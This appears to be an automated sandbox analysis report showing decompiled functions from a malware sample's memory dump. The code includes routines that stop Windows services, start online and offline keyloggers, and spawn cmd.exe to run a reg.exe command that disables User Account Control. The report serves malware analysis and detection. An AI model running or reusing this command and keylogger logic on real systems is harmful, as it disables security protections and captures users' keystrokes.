SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
_abort.LIBCMT ref: 00781D60

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 6b9689908ae0b2732b99c1b6ed014a60d28a4cfcfeaba439ffdc379262bac28f
Instruction ID: 663d22bdfab203caddd8751a2f1449f4cb616c60feb64a328a1ded6306c37f1c
Opcode Fuzzy Hash: 6b9689908ae0b2732b99c1b6ed014a60d28a4cfcfeaba439ffdc379262bac28f
Instruction Fuzzy Hash: F9F0A43A2C0501F6C7123378AC0DF6E162DABD2771B654125F618D2192EF2C89034375

Uniqueness

Uniqueness Score: -1.00%

Function 0075640B, Relevance: 9.0, APIs: 6, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075640B(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, E00741EEB( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00741EF0();
				return _t16;
			}

0x00756416
0x00756425
0x00756434
0x00756438
0x00756459
0x0075645c
0x0075645f
0x0075643a
0x0075643b
0x0075643b
0x00756464
0x00756471

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00755FB6,00000000), ref: 0075641A
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00755FB6,00000000), ref: 0075642E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755FB6,00000000), ref: 0075643B
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00755FB6,00000000), ref: 0075644A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755FB6,00000000), ref: 0075645C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755FB6,00000000), ref: 0075645F

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: efb38c66dcebdb62811ea0330e8121bc7ce8da34cc694b15c4a780ef209f7f93
Instruction ID: 55bfa193a4a68a7e2d00efc1672a1701cb86d279970cb5c03f4b116b4c128bbc
Opcode Fuzzy Hash: efb38c66dcebdb62811ea0330e8121bc7ce8da34cc694b15c4a780ef209f7f93
Instruction Fuzzy Hash: E7F0F6355402287BD610BBA89C8ADBF3B6DDB45751F404016FD0583141EF6C8F4696F5

Uniqueness

Uniqueness Score: -1.00%

Function 00756576, Relevance: 9.0, APIs: 6, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00756576(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00741EEB( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00741EF0();
				return _t16;
			}

0x00756581
0x00756590
0x0075659f
0x007565a3
0x007565c4
0x007565c7
0x007565ca
0x007565a5
0x007565a6
0x007565a6
0x007565cf
0x007565dc

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00755EB6,00000000), ref: 00756585
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00755EB6,00000000), ref: 00756599
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755EB6,00000000), ref: 007565A6
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00755EB6,00000000), ref: 007565B5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755EB6,00000000), ref: 007565C7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00755EB6,00000000), ref: 007565CA

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: c87f052c28fd1bf1da9e57900dd26b2e832c814b5e3b35c312df4af5affad46a
Instruction ID: a5aa1cef5ca3cbf42d97f9605291479df3f8e3a382eeb3b1ac4e2f6877fdf316
Opcode Fuzzy Hash: c87f052c28fd1bf1da9e57900dd26b2e832c814b5e3b35c312df4af5affad46a
Instruction Fuzzy Hash: 3AF0F6355401287BD610BBA8AC49EBF3B6DDB45251F404016FE0993141EF6C8F4A96F4

Uniqueness

Uniqueness Score: -1.00%

Function 0075BD19, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0075BD19(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = E0074BAB9();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = E00779510(_t85, "ALL", 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = E00779510(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E007717E0(_t85, 0x7a57f0);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E0077BCD0( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x7a0830;
								while(1) {
									_t15 = _t93 - 4; // 0x7a5d50
									_t59 = E00779510( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = E00779510( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x7a0834));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x7a0835));
								_t62 =  *((intOrPtr*)(_t76 + 0x7a0834));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E007717E0( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x7a0835));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					E00759333(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}

0x0075bd22
0x0075bd25
0x0075bd2b
0x0075bd2f
0x0075bd32
0x0075bd3a
0x0075bd3d
0x0075bd44
0x0075bee4
0x00000000
0x0075bee4
0x0075bd52
0x0075bd57
0x0075bd5c
0x0075bedf
0x00000000
0x0075bee1
0x0075bd6a
0x0075bd6f
0x0075bd74
0x00000000
0x00000000
0x00000000
0x00000000
0x0075bd7a
0x0075bd7a
0x0075bd80
0x0075bd87
0x0075bd8d
0x0075bda1
0x0075bda3
0x0075bda6
0x0075bdaf
0x0075bdc3
0x0075bdc5
0x0075bdcb
0x0075bdd0
0x0075bdd3
0x0075bdd9
0x0075bddc
0x0075bdde
0x0075bde6
0x0075be1f
0x0075be1f
0x0075be22
0x00000000
0x0075be22
0x0075bde8
0x0075bded
0x0075bdef
0x0075bdf6
0x0075bdfb
0x0075be00
0x00000000
0x00000000
0x0075be0a
0x0075be0f
0x0075be14
0x00000000
0x00000000
0x0075be16
0x0075be17
0x0075be1d
0x00000000
0x00000000
0x00000000
0x0075be1d
0x0075be5d
0x0075be66
0x00000000
0x00000000
0x0075be68
0x0075be6b
0x0075be74
0x0075be7e
0x0075be85
0x0075be8b
0x0075be90
0x0075becd
0x0075becd
0x0075bed4
0x0075bed6
0x0075bed7
0x00000000
0x0075bed7
0x0075be94
0x0075bea4
0x0075bea8
0x0075bebe
0x0075bec2
0x0075bec4
0x0075bec4
0x00000000
0x0075bec2
0x0075beb3
0x0075beb9
0x0075bebc
0x00000000
0x00000000
0x00000000
0x0075bebc
0x0075be96
0x0075be9e
0x00000000
0x00000000
0x00000000
0x00000000
0x0075be9e
0x0075bdb1
0x0075bdb3
0x0075bdb6
0x0075bdb6
0x0075bdb8
0x0075bdb9
0x0075bdbd
0x00000000
0x0075bdbd
0x0075bdaa
0x00000000
0x0075bdaa
0x0075bd8f
0x0075bd91
0x0075bd94
0x0075bd94
0x0075bd96
0x0075bd97
0x0075bd9b
0x00000000
0x0075be25
0x0075be27
0x0075be28
0x0075be32
0x0075be3a
0x0075be3e
0x0075be47
0x0075be4e
0x0075be53
0x00000000

APIs

_strncpy.LIBCMT ref: 0075BDCB

Strings

DEFAULT, xrefs: 0075BD64
ECDSA, xrefs: 0075BEAD
TLS_AES_128_GCM_SHA256, xrefs: 0075BD3D, 0075BD51, 0075BD69, 0075BD7F, 0075BDC5, 0075BDC9
ALL, xrefs: 0075BD4C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _strncpy
String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
API String ID: 2961919466-1012175531
Opcode ID: 9f0653855b492c7cd726e61da8c9e458e8fb82a5746e5e3f390b4cf59a3da99c
Instruction ID: 1498ca1f8cb19c5984cfdb33493d9fe8633281324231764b9a39b79ce86928c1
Opcode Fuzzy Hash: 9f0653855b492c7cd726e61da8c9e458e8fb82a5746e5e3f390b4cf59a3da99c
Instruction Fuzzy Hash: DA513631E04219DBDF20CEA88886BFEBBB49F41301F188569DE44A7286E7BD4D09C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00748742, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00748742(void* __ecx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t43 = (_t41 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				_t2 = _t39 + 0x60; // 0x7ac3b0
				 *((char*)(__ecx + 0x49)) = 1;
				E00749DD2(_t2,  &_a4);
				_t47 =  *0x7aa9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x7aa9d4 != 0x32) {
					E00742084(_t21,  &_v28, "Offline Keylogger Started");
					_t43 = _t43 - 0x18;
					E007572DA(_t43,  &_v32);
					E00749634(_t21, _t39, _t47);
					E00741FC7();
				}
				_t44 = _t43 - 0x18;
				E00742084(_t21, _t43 - 0x18, _t35);
				E00742084(_t21, _t44 - 0x18, "[Info]");
				E00756C80(_t21, _t35);
				CreateThread(0, 0, 0x74884b, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E00748830, _t39, 0, 0);
				}
				CreateThread(0, 0, E0074885A, _t39, 0, 0);
				return E00741EF0();
			}

0x00748748
0x0074874e
0x00748750
0x00748754
0x00748757
0x0074875b
0x00748760
0x00748767
0x0074876c
0x00748773
0x00748778
0x00748781
0x00748788
0x00748791
0x00748791
0x00748796
0x0074879c
0x007487ab
0x007487b0
0x007487ca
0x007487ce
0x007487da
0x007487da
0x007487e6
0x007487f6

APIs

CreateThread.KERNEL32 ref: 007487CA
CreateThread.KERNEL32 ref: 007487DA
CreateThread.KERNEL32 ref: 007487E6

Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED

Strings

[Info], xrefs: 007487A6
Offline Keylogger Started, xrefs: 00748767, 0074876E, 0074879B

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$EventLocalTimewsprintf
String ID: Offline Keylogger Started$[Info]
API String ID: 3534694722-3531117058
Opcode ID: 1d12097ec88fc237a66b1515910db305df5a56e78d46a6e1fdbfb9b94dde8146
Instruction ID: 970bc5d28debbdeccc286f50e64b8b89c177e841dd476b9cf223315373236104
Opcode Fuzzy Hash: 1d12097ec88fc237a66b1515910db305df5a56e78d46a6e1fdbfb9b94dde8146
Instruction Fuzzy Hash: 8E11A7A120020C7ED214B7749CCACBF3A5CDA82394B84062DF94552193EF6C5D59C6F3

Uniqueness

Uniqueness Score: -1.00%

Function 007493AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E007493AD(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00742084(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					E007572DA(_t32,  &_v28);
					E00749634(_t18, _t30, _t36);
					E00741FC7();
					_t33 = _t32 - 0x18;
					E00742084(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00742084(_t18, _t33 - 0x18, "[Info]");
					E00756C80(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, E00748830, _t30, 0, 0);
						}
						CreateThread(0, 0, E0074885A, _t30, 0, 0);
					}
					return CreateThread(0, 0, E00748869, _t30, 0, 0);
				}
				return _t7;
			}

0x007493b5
0x007493b8
0x007493bc
0x007493c2
0x007493c7
0x007493cf
0x007493d4
0x007493dc
0x007493e3
0x007493eb
0x007493f0
0x007493f6
0x00749405
0x0074940a
0x0074941d
0x00749421
0x0074942d
0x0074942d
0x00749439
0x00749439
0x00000000
0x00749445
0x0074944d

APIs

Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED

Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A

CreateThread.KERNEL32 ref: 0074942D
CreateThread.KERNEL32 ref: 00749439
CreateThread.KERNEL32 ref: 00749445

Strings

Online Keylogger Started, xrefs: 007493C2, 007493CB, 007493F5
[Info], xrefs: 00749400

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$LocalTime$Eventwsprintf
String ID: Online Keylogger Started$[Info]
API String ID: 3546759147-3401407043
Opcode ID: df0045e7a08d32bb7b8cf5bc9308d4e79fceb10d77ceba8aaedbdb6a74996313
Instruction ID: 31b71dd860b271081ce0e918c7d1d86ba25c454626c11a63ba176f22103c1b28
Opcode Fuzzy Hash: df0045e7a08d32bb7b8cf5bc9308d4e79fceb10d77ceba8aaedbdb6a74996313
Instruction Fuzzy Hash: 7801C49170124C7AE62072798C8ADBF7A6CDA82394F80056DFA4112142DE6D1C5A82F2

Uniqueness

Uniqueness Score: -1.00%

Function 00758DDA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00758DDA() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00771F00(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E00758E5A;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}

0x00758dec
0x00758df6
0x00758e00
0x00758e06
0x00758e10
0x00758e13
0x00758e14
0x00758e1b
0x00758e1e
0x00758e1f
0x00758e22
0x00758e23
0x00758e25
0x00758e2f
0x00758e51
0x00000000
0x00758e51
0x00758e41
0x00758e49
0x00758e4b
0x00000000
0x00758e4b
0x00758e59

APIs

RegisterClassExA.USER32(00000030), ref: 00758E26
CreateWindowExA.USER32 ref: 00758E41
GetLastError.KERNEL32 ref: 00758E4B

Strings

0, xrefs: 00758DF6
MsgWindowClass, xrefs: 00758DF1

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 5d8058c4c72b193a4acec3e296f18db215c2cacd615739cd6f72dd7ead0556f4
Instruction ID: 04715daf3ba670f339ec2f39534b2f0bcf9a13b1b7054e214ba2cbae51784e61
Opcode Fuzzy Hash: 5d8058c4c72b193a4acec3e296f18db215c2cacd615739cd6f72dd7ead0556f4
Instruction Fuzzy Hash: 1B01E9B190021DABDB00DF95AC859EFBBBCFB05795B40452AF914A6240EBB45A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00772D11, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00772D11(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				void* _t33;

				_t28 = __edx;
				_t26 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_t5 =  &_a4; // 0x77313d
					_push( *_t5);
					E00773360(_t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_t7 =  &_a4; // 0x77313d
				_push( *_t7);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E007722EB(_t27);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E00773562(_t26, _t27, _t28, _t29, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_t24 = _a24;
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				"j8hH~z"();
				if(_t24 != 0) {
					E007722B9(_t24, _t29);
					return _t24;
				}
				return _t24;
			}

0x00772d11
0x00772d11
0x00772d14
0x00772d19
0x00772d1c
0x00772d1e
0x00772d21
0x00772d24
0x00772d25
0x00772d25
0x00772d28
0x00772d2d
0x00772d2d
0x00772d30
0x00772d34
0x00772d34
0x00772d37
0x00772d3c
0x00772d39
0x00772d39
0x00772d39
0x00772d3f
0x00772d45
0x00772d48
0x00772d4a
0x00772d4d
0x00772d50
0x00772d51
0x00772d5a
0x00772d5f
0x00772d62
0x00772d65
0x00772d68
0x00772d6b
0x00772d6e
0x00772d71
0x00772d72
0x00772d75
0x00772d80
0x00772d84
0x00000000
0x00772d84
0x00772d8b

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00772D28

Part of subcall function 00773360: ___AdjustPointer.LIBCMT ref: 007733AA

_UnwindNestedFrames.LIBCMT ref: 00772D3F
___FrameUnwindToState.LIBVCRUNTIME ref: 00772D51
CallCatchBlock.LIBVCRUNTIME ref: 00772D75

Strings

=1w, xrefs: 00772D34, 00772D25

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: =1w
API String ID: 2633735394-3687730428
Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction ID: 484afa0c5f0e79305fe37215b07ae019e00287aa7cf818e9e2e0076281fde449
Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction Fuzzy Hash: 1901E932100109FBCF225F55CC05EDA3BBAFF58794F158514F96C66122D73AE962EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0074D3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0074D3F7() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				E00771F00(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}

0x0074d402
0x0074d40b
0x0074d412
0x0074d41b
0x0074d41c
0x0074d41d
0x0074d41e
0x0074d43b
0x0074d44a
0x0074d457

APIs

CreateProcessA.KERNEL32 ref: 0074D43B
CloseHandle.KERNEL32(0074C5FB), ref: 0074D44A
CloseHandle.KERNEL32(00000027), ref: 0074D44F

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0074D431
C:\Windows\System32\cmd.exe, xrefs: 0074D436

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: f7888bb3ce6fa2087883137582da7e9ae6d2d6a358bdbcd3f1496efe397cec16
Instruction ID: 73ec29cfc7ecce6bf31d04d572385959fba51b1f72e84a42497c74eb7f6be7d9
Opcode Fuzzy Hash: f7888bb3ce6fa2087883137582da7e9ae6d2d6a358bdbcd3f1496efe397cec16
Instruction Fuzzy Hash: 3DF090B290012C7EEB00ABE9EC85EEFBF7CEB88795F000522F604E2010D5306D148BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0074519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0074519B(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x7abb03; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00742084(0, _t31 - 0x18, "Connection timeout");
						E00742084(0, _t32 - 0x18, "[WARNING]");
						E00756C80(0, _t29);
					}
					E00744E0B(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}

0x0074519b
0x0074519d
0x007451a1
0x007451a7
0x007451c6
0x007451c6
0x007451c9
0x007451cf
0x007451d1
0x007451db
0x007451ea
0x007451ef
0x007451f4
0x007451f9
0x00000000
0x00000000
0x00000000
0x00000000
0x007451a9
0x007451a9
0x007451b1
0x007451b7
0x007451ba
0x007451bf
0x00000000
0x00000000
0x007451c4
0x00000000
0x00000000
0x00000000
0x007451c4
0x00745207
0x00745210
0x00745213
0x00745216
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00745196), ref: 007451B1
CloseHandle.KERNEL32(?), ref: 00745207
SetEvent.KERNEL32(?), ref: 00745216

Strings

Connection timeout, xrefs: 007451D6
[WARNING], xrefs: 007451E5

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: fbd6103d4cd2e0f5263852445a5d8a3cd223ee9a38f2474032305894be6a5d11
Instruction ID: 8eea2894264d2ae0f00827e3690811f627b8dc40b0fc21cd69b4f97caafc3e95
Opcode Fuzzy Hash: fbd6103d4cd2e0f5263852445a5d8a3cd223ee9a38f2474032305894be6a5d11
Instruction Fuzzy Hash: FF01D671641B40EFC725BF799C4A42ABBE5FF05705340882EE5C382A63CBAD9815CB51

Uniqueness

Uniqueness Score: -1.00%

